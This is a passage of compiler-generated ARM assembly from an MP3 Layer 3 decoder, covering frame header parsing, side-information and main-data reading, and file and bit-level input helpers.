[r0, r3, lsl #2] mov r0, #3 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #66 str r1, [r0, r3, lsl #2] ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #30 mov r2, #0 str r2, [r1, r3, lsl #2] .L55: mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #70 str r1, [r0, r3, lsl #2] mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #74 str r1, [r0, r3, lsl #2] mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #78 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L47: ldr r2, [fp, #-40] ldr r3, [fp, #-20] cmp r2, r3 bcc .L58 ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L46: ldr r3, [fp, #-36] cmp r3, #1 bls .L59 mov r3, #0 .L35: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L61: .align 2 .L60: .word g_frame_header .word g_mpeg1_bitrates .word g_sampling_frequency .word stderr .word .LC3 .word g_side_info .size Read_Audio_L3, .-Read_Audio_L3 .align 2 .syntax unified .arm .fpu softvfp .type Read_CRC, %function Read_CRC: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl Get_Byte mov r3, r0 cmn r3, #1 beq .L63 bl Get_Byte mov r3, r0 cmn r3, #1 bne .L64 .L63: mov r3, #0 b .L65 .L64: mov r3, #0 .L65: mov r0, r3 pop {fp, pc} .size Read_CRC, .-Read_CRC .section .rodata .align 2 .LC4: .ascii "Only layer 3(!= %d) is supported!\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Read_Frame, %function Read_Frame: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r3, #0 str r3, [fp, #-8] bl Get_Filepos mov r3, r0 cmp r3, #0 bne .L67 bl Decode_L3_Init_Song .L67: bl Read_Header mov r3, r0 cmp r3, #0 beq .L68 mvn r3, #0 b .L69 .L68: ldr r3, .L73 ldr r3, [r3, #8] cmp r3, #0 bne .L70 bl Read_CRC mov r3, r0 cmp r3, #0 beq .L70 mvn r3, #0 b .L69 .L70: ldr r3, .L73 ldr r3, [r3, #4] cmp r3, #3 bne .L71 bl Read_Audio_L3 bl Read_Main_L3 mov r3, r0 cmp r3, #0 beq .L72 mvn r3, #0 b .L69 .L71: ldr r3, .L73+4 ldr r3, [r3] ldr r2, .L73 ldr r2, [r2, #4] ldr r1, .L73+8 mov r0, r3 bl fprintf ldr r3, .L73+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L69 .L72: mov r3, #0 .L69: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L74: .align 2 .L73: .word g_frame_header .word stderr .word .LC4 .size Read_Frame, .-Read_Frame .section .rodata .align 2 .LC5: .ascii "ID must be 1\012Header word is 0x%08x at file pos %" .ascii "d\012\000" .align 2 .LC6: .ascii "Free bitrate format NIY!\012Header word is 0x%08x a" .ascii "t file pos %d\012\000" .align 2 .LC7: .ascii "bitrate_index = 15 is invalid!\012Header word is 0x" .ascii "%08x at file pos %d\012\000" .align 2 .LC8: .ascii "sampling_frequency = 3 is invalid!\012\000" .align 2 .LC9: .ascii "Header word is 0x%08x at file pos %d\012\000" .align 2 .LC10: .ascii "layer = 0 is invalid!\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Read_Header, %function Read_Header: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #28 bl Get_Byte str r0, [fp, #-16] bl Get_Byte str r0, [fp, #-32] bl Get_Byte str r0, [fp, #-28] bl Get_Byte str r0, [fp, #-24] ldr r3, [fp, #-16] cmn r3, #1 beq .L76 ldr r3, [fp, #-32] cmn r3, #1 beq .L76 ldr r3, [fp, #-28] cmn r3, #1 beq .L76 ldr r3, [fp, #-24] cmn r3, #1 bne .L77 .L76: mvn r3, #0 b .L78 .L77: ldr r3, [fp, #-16] lsl r2, r3, #24 ldr r3, [fp, #-32] lsl r3, r3, #16 orr r2, r2, r3 ldr r3, [fp, #-28] lsl r3, r3, #8 orr r3, r2, r3 ldr r2, [fp, #-24] orr r3, r2, r3 str r3, [fp, #-20] b .L79 .L81: ldr r3, [fp, #-32] str r3, [fp, #-16] ldr r3, [fp, #-28] str r3, [fp, #-32] ldr r3, [fp, #-24] str r3, [fp, #-28] bl Get_Byte str r0, [fp, #-24] ldr r3, [fp, #-24] cmn r3, #1 bne .L80 mvn r3, #0 b .L78 .L80: ldr r3, [fp, #-16] lsl r2, r3, #24 ldr r3, [fp, #-32] lsl r3, r3, #16 orr r2, r2, r3 ldr r3, [fp, #-28] lsl r3, r3, #8 orr r3, r2, r3 ldr r2, [fp, #-24] orr r3, r2, r3 str r3, [fp, #-20] .L79: ldr r3, [fp, #-20] lsr r3, r3, #20 lsl r3, r3, #20 cmn r3, #1048576 bne .L81 ldr r3, [fp, #-20] lsr r3, r3, #19 and r3, r3, #1 ldr r2, .L87 str r3, [r2] ldr r3, [fp, #-20] lsr r3, r3, #17 and r3, r3, #3 ldr r2, .L87 str r3, [r2, #4] ldr r3, [fp, #-20] lsr r3, r3, #16 and r3, r3, #1 ldr r2, .L87 str r3, [r2, #8] ldr r3, [fp, #-20] lsr r3, r3, #12 and r3, r3, #15 ldr r2, .L87 str r3, [r2, #12] ldr r3, [fp, #-20] lsr r3, r3, #10 and r3, r3, #3 ldr r2, .L87 str r3, [r2, #16] ldr r3, [fp, #-20] lsr r3, r3, #9 and r3, r3, #1 ldr r2, .L87 str r3, [r2, #20] ldr r3, [fp, #-20] lsr r3, r3, #8 and r3, r3, #1 ldr r2, .L87 str r3, [r2, #24] ldr r3, [fp, #-20] lsr r3, r3, #6 and r3, r3, #3 ldr r2, .L87 str r3, [r2, #28] ldr r3, [fp, #-20] lsr r3, r3, #4 and r3, r3, #3 ldr r2, .L87 str r3, [r2, #32] ldr r3, [fp, #-20] lsr r3, r3, #3 and r3, r3, #1 ldr r2, .L87 str r3, [r2, #36] ldr r3, [fp, #-20] lsr r3, r3, #2 and r3, r3, #1 ldr r2, .L87 str r3, [r2, #40] ldr r3, [fp, #-20] and r3, r3, #3 ldr r2, .L87 str r3, [r2, #44] ldr r3, .L87 ldr r3, [r3] cmp r3, #1 beq .L82 ldr r3, .L87+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-20] ldr r1, .L87+8 mov r0, r4 bl fprintf ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L78 .L82: ldr r3, .L87 ldr r3, [r3, #12] cmp r3, #0 bne .L83 ldr r3, .L87+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-20] ldr r1, .L87+12 mov r0, r4 bl fprintf ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mov r0, #1 bl exit .L83: ldr r3, .L87 ldr r3, [r3, #12] cmp r3, #15 bne .L84 ldr r3, .L87+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-20] ldr r1, .L87+16 mov r0, r4 bl fprintf ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L78 .L84: ldr r3, .L87 ldr r3, [r3, #16] cmp r3, #3 bne .L85 ldr r3, .L87+4 ldr r3, [r3] mov r2, #35 mov r1, #1 ldr r0, .L87+20 bl fwrite ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc ldr r3, .L87+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-20] ldr r1, .L87+24 mov r0, r4 bl fprintf ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L78 .L85: ldr r3, .L87 ldr r3, [r3, #4] cmp r3, #0 bne .L86 ldr r3, .L87+4 ldr r3, [r3] mov r2, #22 mov r1, #1 ldr r0, .L87+28 bl fwrite ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc ldr r3, .L87+4 ldr r4, [r3] bl Get_Filepos mov r3, r0 ldr r2, [fp, #-20] ldr r1, .L87+24 mov r0, r4 bl fprintf ldr r3, .L87+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L78 .L86: ldr r3, .L87 ldr r3, [r3, #4] rsb r3, r3, #4 ldr r2, .L87 str r3, [r2, #4] mov r3, #0 .L78: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L88: .align 2 .L87: .word g_frame_header .word stderr .word .LC5 .word .LC6 .word .LC7 .word .LC8 .word .LC9 .word .LC10 .size Read_Header, .-Read_Header .align 2 .syntax unified .arm .fpu softvfp .type Read_Main_L3, %function Read_Main_L3: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #48 ldr r3, .L147 ldr r3, [r3, #28] cmp r3, #3 bne .L90 mov r3, #1 b .L91 .L90: mov r3, #2 .L91: str r3, [fp, #-32] ldr r3, .L147 ldr r3, [r3, #4] sub r2, r3, #1 ldr r3, .L147 ldr r1, [r3, #12] ldr r0, .L147+4 mov r3, r2 lsl r3, r3, #4 sub r3, r3, r2 add r3, r3, r1 ldr r2, [r0, r3, lsl #2] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #4 mov r0, r3 ldr r3, .L147 ldr r3, [r3, #16] ldr r2, .L147+8 ldr r3, [r2, r3, lsl #2] mov r1, r3 bl __aeabi_uidiv mov r3, r0 mov r2, r3 ldr r3, .L147 ldr r3, [r3, #20] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-28] cmp r3, #2000 bls .L92 ldr r3, .L147+12 ldr r3, [r3] ldr r2, [fp, #-28] ldr r1, .L147+16 mov r0, r3 bl fprintf ldr r3, .L147+12 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L93 .L92: ldr r3, [fp, #-32] cmp r3, #1 bne .L94 mov r3, #17 b .L95 .L94: mov r3, #32 .L95: str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-24] sub r3, r2, r3 sub r3, r3, #4 str r3, [fp, #-52] ldr r3, .L147 ldr r3, [r3, #8] cmp r3, #0 bne .L96 ldr r3, [fp, #-52] sub r3, r3, #2 str r3, [fp, #-52] .L96: ldr r3, .L147+20 ldr r3, [r3] mov r1, r3 ldr r0, [fp, #-52] bl Get_Main_Data mov r3, r0 cmp r3, #0 beq .L97 mvn r3, #0 b .L93 .L97: mov r3, #0 str r3, [fp, #-48] b .L98 .L146: mov r3, #0 str r3, [fp, #-44] b .L99 .L145: bl Get_Main_Pos str r0, [fp, #-20] ldr r1, .L147+20 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #22 ldr r3, [r1, r3, lsl #2] ldr r2, .L147+24 ldr r3, [r2, r3, lsl #3] str r3, [fp, #-16] ldr r1, .L147+20 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #22 ldr r3, [r1, r3, lsl #2] ldr r2, .L147+24 lsl r3, r3, #3 add r3, r2, r3 ldr r3, [r3, #4] str r3, [fp, #-12] ldr r1, .L147+20 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L100 ldr r1, .L147+20 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L100 ldr r1, .L147+20 ldr r3, [fp, #-48] lsl r2, r3, #1 ldr r3, [fp, #-44] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L101 mov r3, #0 str r3, [fp, #-40] b .L102 .L103: ldr r0, [fp, #-16] bl Get_Main_Bits ldr ip, .L147+28 ldr r1, [fp, #-44] ldr r2, [fp, #-48] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-40] add r3, r2, r3 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L102: ldr r3, [fp, #-40] cmp r3, #7 bls .L103 mov r3, #3 str r3, [fp, #-40] b .L104 .L109: ldr r3, [fp, #-40] cmp r3, #5 bhi .L105 ldr r3, [fp, #-16] b .L106 .L105: ldr r3, [fp, #-12] .L106: str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-36] b .L107 .L108: ldr r0, [fp, #-8] bl Get_Main_Bits mov ip, r0 ldr lr, .L147+28 ldr r3, [fp, #-40] ldr r0, [fp, #-44] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r0 lsl r3, r3, #3 add r3, r3, r0 lsl r3, r3, #2 add r2, r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #3 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #84 str ip, [lr, r3, lsl #2] ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L107: ldr r3, [fp, #-36] cmp r3, #2 bls .L108 ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L104: ldr r3, [fp, #-40] cmp r3, #11 bls .L109 b .L117 .L101: mov r3, #0 str r3, [fp, #-40] b .L111 .L116: ldr r3, [fp, #-40] cmp r3, #5 bhi .L112 ldr r3, [fp, #-16] b .L113 .L112: ldr r3, [fp, #-12] .L113: str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-36] b .L114 .L115: ldr r0, [fp, #-8] bl Get_Main_Bits mov ip, r0 ldr lr, .L147+28 ldr r3, [fp, #-40] ldr r0, [fp, #-44] ldr r1, [fp, #-48] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r0 lsl r3, r3, #3 add r3, r3, r0 lsl r3, r3, #2 add r2, r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #3 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #84 str ip, [lr, r3, lsl #2] ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L114: ldr r3, [fp, #-36] cmp r3, #2 bls .L115 ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L111: ldr r3, [fp, #-40] cmp r3, #11 bls .L116 b .L117 .L100: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #8] cmp r3, #0 beq .L118 ldr r3, [fp, #-48] cmp r3, #0 bne .L119 .L118: mov r3, #0 str r3, [fp, #-40] b .L120 .L121: ldr r0, [fp, #-16] bl Get_Main_Bits ldr ip, .L147+28 ldr r1, [fp, #-44] ldr r2, [fp, #-48] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-40] add r3, r2, r3 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L120: ldr r3, [fp, #-40] cmp r3, #5 bls .L121 b .L122 .L119: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #8] cmp r3, #1 bne .L122 ldr r3, [fp, #-48] cmp r3, #1 bne .L122 mov r3, #0 str r3, [fp, #-40] b .L123 .L124: ldr r1, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 ldr r1, [r1, r3, lsl #2] ldr r0, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #42 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L123: ldr r3, [fp, #-40] cmp r3, #5 bls .L124 .L122: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #12] cmp r3, #0 beq .L125 ldr r3, [fp, #-48] cmp r3, #0 bne .L126 .L125: mov r3, #6 str r3, [fp, #-40] b .L127 .L128: ldr r0, [fp, #-16] bl Get_Main_Bits ldr ip, .L147+28 ldr r1, [fp, #-44] ldr r2, [fp, #-48] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-40] add r3, r2, r3 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L127: ldr r3, [fp, #-40] cmp r3, #10 bls .L128 b .L129 .L126: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #12] cmp r3, #1 bne .L129 ldr r3, [fp, #-48] cmp r3, #1 bne .L129 mov r3, #6 str r3, [fp, #-40] b .L130 .L131: ldr r1, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 ldr r1, [r1, r3, lsl #2] ldr r0, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #42 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L130: ldr r3, [fp, #-40] cmp r3, #10 bls .L131 .L129: ldr r2, .L147+20 ldr r3, [fp, #-44] add r3, r3, #1 ldr r3, [r2, r3, lsl #4] cmp r3, #0 beq .L132 ldr r3, [fp, #-48] cmp r3, #0 bne .L133 .L132: mov r3, #11 str r3, [fp, #-40] b .L134 .L135: ldr r0, [fp, #-12] bl Get_Main_Bits ldr ip, .L147+28 ldr r1, [fp, #-44] ldr r2, [fp, #-48] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-40] add r3, r2, r3 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L134: ldr r3, [fp, #-40] cmp r3, #15 bls .L135 b .L136 .L133: ldr r2, .L147+20 ldr r3, [fp, #-44] add r3, r3, #1 ldr r3, [r2, r3, lsl #4] cmp r3, #1 bne .L136 ldr r3, [fp, #-48] cmp r3, #1 bne .L136 mov r3, #11 str r3, [fp, #-40] b .L137 .L138: ldr r1, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 ldr r1, [r1, r3, lsl #2] ldr r0, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #42 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L137: ldr r3, [fp, #-40] cmp r3, #15 bls .L138 .L136: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #20] cmp r3, #0 beq .L139 ldr r3, [fp, #-48] cmp r3, #0 bne .L140 .L139: mov r3, #16 str r3, [fp, #-40] b .L141 .L142: ldr r0, [fp, #-12] bl Get_Main_Bits ldr ip, .L147+28 ldr r1, [fp, #-44] ldr r2, [fp, #-48] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 lsl r3, r2, #1 mov r2, r3 add r2, r1, r2 ldr r3, [fp, #-40] add r3, r2, r3 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L141: ldr r3, [fp, #-40] cmp r3, #20 bls .L142 b .L117 .L140: ldr r2, .L147+20 ldr r3, [fp, #-44] lsl r3, r3, #4 add r3, r2, r3 ldr r3, [r3, #20] cmp r3, #1 bne .L117 ldr r3, [fp, #-48] cmp r3, #1 bne .L117 mov r3, #16 str r3, [fp, #-40] b .L143 .L144: ldr r1, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 ldr r1, [r1, r3, lsl #2] ldr r0, .L147+28 ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r2, r3, #3 sub r2, r2, r3 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #42 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L143: ldr r3, [fp, #-40] cmp r3, #20 bls .L144 .L117: ldr r2, [fp, #-44] ldr r1, [fp, #-48] ldr r0, [fp, #-20] bl Read_Huffman ldr r3, [fp, #-44] add r3, r3, #1 str r3, [fp, #-44] .L99: ldr r2, [fp, #-44] ldr r3, [fp, #-32] cmp r2, r3 bcc .L145 ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L98: ldr r3, [fp, #-48] cmp r3, #1 bls .L146 mov r3, #0 .L93: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L148: .align 2 .L147: .word g_frame_header .word g_mpeg1_bitrates .word g_sampling_frequency .word stderr .word .LC3 .word g_side_info .word mpeg1_scalefac_sizes .word g_main_data .size Read_Main_L3, .-Read_Main_L3 .align 2 .syntax unified .arm .fpu softvfp .type Set_Main_Pos, %function Set_Main_Pos: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] lsr r3, r3, #3 lsl r3, r3, #2 ldr r2, .L151 add r3, r3, r2 ldr r2, .L151+4 str r3, [r2] ldr r3, [fp, #-8] and r3, r3, #7 ldr r2, .L151+8 str r3, [r2] mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L152: .align 2 .L151: .word g_main_data_vec .word g_main_data_ptr .word g_main_data_idx .size Set_Main_Pos, .-Set_Main_Pos .section .rodata .align 2 .LC11: .ascii "-\000" .align 2 .LC12: .ascii "r\000" .align 2 .LC13: .ascii "Cannot open file\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Get_Byte, %function Get_Byte: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 ldr r3, .L158 ldr r3, [r3] cmp r3, #0 bne .L154 ldr r3, .L158+4 ldr r3, [r3] cmp r3, #0 beq .L154 ldr r3, .L158+4 ldr r3, [r3] ldr r1, .L158+8 mov r0, r3 bl strcmp mov r3, r0 cmp r3, #0 bne .L155 ldr r3, .L158+12 ldr r3, [r3] ldr r2, .L158 str r3, [r2] ldr r3, .L158 ldr r3, [r3] cmp r3, #0 bne .L154 .L155: ldr r3, .L158+4 ldr r3, [r3] ldr r1, .L158+16 mov r0, r3 bl fopen mov r3, r0 ldr r2, .L158 str r3, [r2] ldr r3, .L158 ldr r3, [r3] cmp r3, #0 bne .L154 mov r1, #0 ldr r0, .L158+20 bl Error .L154: ldr r3, .L158 ldr r3, [r3] mov r0, r3 bl fgetc mov r3, r0 and r3, r3, #255 str r3, [fp, #-8] ldr r3, .L158 ldr r3, [r3] mov r0, r3 bl feof mov r3, r0 cmp r3, #0 beq .L156 mvn r3, #0 str r3, [fp, #-8] .L156: ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L159: .align 2 .L158: .word fp .word filename .word .LC11 .word stdin .word .LC12 .word .LC13 .size Get_Byte, .-Get_Byte .align 2 .syntax unified .arm .fpu softvfp .type Get_Filepos, %function Get_Filepos: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r3, .L164 ldr r3, [r3] cmp r3, #0 bne .L161 mov r3, #0 b .L162 .L161: ldr r3, .L164 ldr r3, [r3] mov r0, r3 bl feof mov r3, r0 cmp r3, #0 beq .L163 mvn r3, #0 b .L162 .L163: ldr r3, .L164 ldr r3, [r3] mov r0, r3 bl ftell mov r3, r0 .L162: mov r0, r3 pop {fp, pc} .L165: .align 2 .L164: .word fp .size Get_Filepos, .-Get_Filepos .align 2 .syntax unified .arm .fpu softvfp .type Get_Filesize, %function Get_Filesize: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 ldr r3, .L169 ldr r3, [r3] cmp r3, #0 bne .L167 mov r3, #0 b .L168 .L167: bl Get_Filepos str r0, [fp, #-12] ldr r3, .L169 ldr r3, [r3] mov r2, #2 mov r1, #0 mov r0, r3 bl fseek ldr r3, .L169 ldr r3, [r3] mov r0, r3 bl ftell mov r3, r0 str r3, [fp, #-8] ldr r0, [fp, #-12] bl Set_Filepos ldr r3, [fp, #-8] .L168: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L170: .align 2 .L169: .word fp .size Get_Filesize, .-Get_Filesize .align 2 .global Close_File .syntax unified .arm .fpu softvfp .type Close_File, %function Close_File: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r3, .L173 ldr r3, [r3] cmp r3, #0 beq .L172 ldr r3, .L173 ldr r3, [r3] mov r0, r3 bl fclose .L172: ldr r3, .L173 mov r2, #0 str r2, [r3] nop pop {fp, pc} .L174: .align 2 .L173: .word fp .size Close_File, .-Close_File .align 2 .syntax unified .arm .fpu softvfp .type Get_Main_Bit, %function Get_Main_Bit: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 ldr r3, .L177 ldr r3, [r3] ldr r2, [r3] ldr r3, .L177+4 ldr r3, [r3] rsb r3, r3, #7 lsr r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] and r3, r3, #1 str r3, [fp, #-8] ldr r3, .L177 ldr r2, [r3] ldr r3, .L177+4 ldr r3, [r3] add r3, r3, #1 lsr r3, r3, #3 lsl r3, r3, #2 add r3, r2, r3 ldr r2, .L177 str r3, [r2] ldr r3, .L177+4 ldr r3, [r3] add r3, r3, #1 and r3, r3, #7 ldr r2, .L177+4 str r3, [r2] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L178: .align 2 .L177: .word g_main_data_ptr .word g_main_data_idx .size Get_Main_Bit, .-Get_Main_Bit .align 2 .syntax unified .arm .fpu softvfp .type Get_Main_Bits, %function Get_Main_Bits: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #0 bne .L180 mov r3, #0 b .L181 .L180: ldr r3, .L182 ldr r3, [r3] ldr r3, [r3] lsl r2, r3, #24 ldr r3, .L182 ldr r3, [r3] add r3, r3, #4 ldr r3, [r3] lsl r3, r3, #16 orr r2, r2, r3 ldr r3, .L182 ldr r3, [r3] add r3, r3, #8 ldr r3, [r3] lsl r3, r3, #8 orr r2, r2, 